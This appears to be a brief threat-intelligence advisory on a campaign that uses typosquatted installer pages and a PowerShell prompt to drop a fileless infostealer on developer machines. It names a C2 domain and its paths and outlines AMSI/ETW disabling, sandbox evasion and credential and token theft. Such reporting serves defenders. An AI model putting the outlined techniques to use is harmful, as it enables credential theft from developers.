Global Malicious AI Installer Campaign Targets Developer Workstations

A sophisticated campaign targets software engineers by publishing typosquatted, SEO-poisoned installer pages that prompt a PowerShell command which concurrently completes a legitimate CLI installation and injects a fileless infostealer into memory; the malware disables AMSI/ETW, performs anti-sandbox checks, harvests credentials and session tokens from browsers and collaboration apps, and communicates with C2 endpoints (e.g., events.msft23.com with /take, /process, /validate) to receive RSA-encrypted tasking.